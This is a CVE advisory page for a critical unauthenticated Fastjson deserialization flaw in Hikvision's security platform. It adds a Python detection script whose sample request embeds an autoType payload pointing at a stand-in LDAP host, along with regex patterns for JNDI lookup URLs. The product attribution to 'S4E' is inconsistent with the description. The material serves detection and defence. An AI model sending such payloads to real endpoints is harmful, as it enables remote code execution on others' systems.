
CVE-2025-34067

Critical · Public PoC · RCE

Published: 02 July 2025
Modified: 15 April 2026
KEV Added: none
Patch: none referenced
CVSS v4.0 score: 10.0 (vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X)
EPSS score: 0.0842 (92.5th percentile)
Risk priority: 25 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-34067 is a critical-severity Deserialization of Untrusted Data (CWE-502) vulnerability attributed to S4E (the affected product is inferred from references; the vulnerability details below name the Hikvision Integrated Security Management Platform). Its CVSS base score is 10.0 (Critical).

Operationally, this CVE ranks in the top 7.5% of CVEs by exploit likelihood (EPSS); it is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.

Deeper analysis

CVE-2025-34067 is an unauthenticated remote code execution flaw in the applyCT component of the Hikvision Integrated Security Management Platform. The vulnerability stems from the component's use of a vulnerable Fastjson library version; the endpoint /bic/ssoService/v1/applyCT accepts and deserializes untrusted user input, enabling Fastjson's auto-type feature to load arbitrary Java classes referenced through an LDAP URL.

An attacker with network access can send a crafted request to the endpoint that triggers class loading and achieves arbitrary command execution on the underlying system. No authentication or user interaction is required, and the CVSS 4.0 score of 10.0 reflects the full impact across confidentiality, integrity, and availability.
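As an added detection example (not code from this page or from Hikvision), the following Python inspects requests to the applyCT endpoint for the Fastjson autoType marker and the LDAP/RMI-style lookup URLs that the description above identifies as the class-loading mechanism. The endpoint path is taken from the page; the sample requests, the placeholder class name and the attacker.invalid host are constructed.

```python
import json
import re

# Endpoint named in the advisory.
TARGET_PATH = "/bic/ssoService/v1/applyCT"
# Fastjson resolves the reserved "@type" key to a class name when autoType is enabled.
AUTOTYPE_KEY = "@type"
# JNDI lookup schemes that let a deserialised object fetch a class from a remote directory.
JNDI_RE = re.compile(r"^(ldap|ldaps|rmi)://", re.IGNORECASE)


def _walk(node, path=""):
    """Yield (json_path, key, value) for every key/value pair in a nested JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            yield child, key, value
            yield from _walk(value, child)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")


def inspect_request(path: str, body: str) -> list:
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    findings = []
    if path != TARGET_PATH:
        return findings
    try:
        doc = json.loads(body)
    except ValueError:
        # Fastjson is more permissive than the standard parser, so a body that
        # json.loads rejects still deserves a look: flag it rather than ignore it.
        return ["body is not strict JSON; review manually"]
    for jpath, key, value in _walk(doc):
        if key == AUTOTYPE_KEY:
            findings.append(f"autoType marker at {jpath} -> {value!r}")
        if isinstance(value, str) and JNDI_RE.match(value):
            findings.append(f"JNDI lookup URL at {jpath} -> {value!r}")
    return findings


# Constructed sample requests (not captured traffic); the class name and host are placeholders.
SAMPLES = [
    (TARGET_PATH, '{"username": "alice", "ticket": "abc123"}'),
    (TARGET_PATH, '{"user": {"@type": "example.Placeholder", "config": "ldap://attacker.invalid:1389/x"}}'),
    ("/other/endpoint", '{"@type": "x"}'),
]


def scan(samples=SAMPLES):
    """Run the inspector over every (path, body) pair and return the findings per request."""
    return [(path, inspect_request(path, body)) for path, body in samples]


if __name__ == "__main__":
    for path, findings in scan():
        print(path, "ALERT" if findings else "ok", findings)
```

The same walk can be pointed at other Fastjson-backed endpoints by changing TARGET_PATH, since the autoType marker is a property of the library, not of this one component.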

Exploitation evidence was recorded by the Shadowserver Foundation on 2025-02-05 UTC. The EPSS score has remained at 0.0842, its peak to date, with no material increase since disclosure. Public references, including detailed write-ups on GitHub and advisories from VulnCheck and S4E, document the issue, but the available sources do not specify vendor patches or configuration mitigations.


Vulnerability details

An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.

CWE(s)

CWE-502: Deserialization of Untrusted Data

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

S4E (inferred from references and description; NVD did not file a CPE for this CVE)

Mitigating Controls

Likely Mitigating Controls (AI)

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

Each of the controls below addresses CWE-502:

- Penetration testing supplies malicious serialized objects, detecting unsafe deserialization and supporting corrective actions.
- Evaluation of untrusted data handling (deserialization testing) reveals unsafe processing, which the required remediation process then addresses.
- Untrusted serialized data can be deserialized and observed inside a sandbox (detonation chamber), so that gadget-chain exploitation is contained and cannot reach systems outside it.
- Input validation rejects or sanitizes untrusted serialized data before deserialization occurs.
- Boundary controls identify and block malicious code introduced through deserialization of untrusted data at system boundaries.
- Integrity verification of serialized information can detect tampering before deserialization occurs.
- Provenance of associated data allows detection of untrusted sources before deserialization or processing occurs.
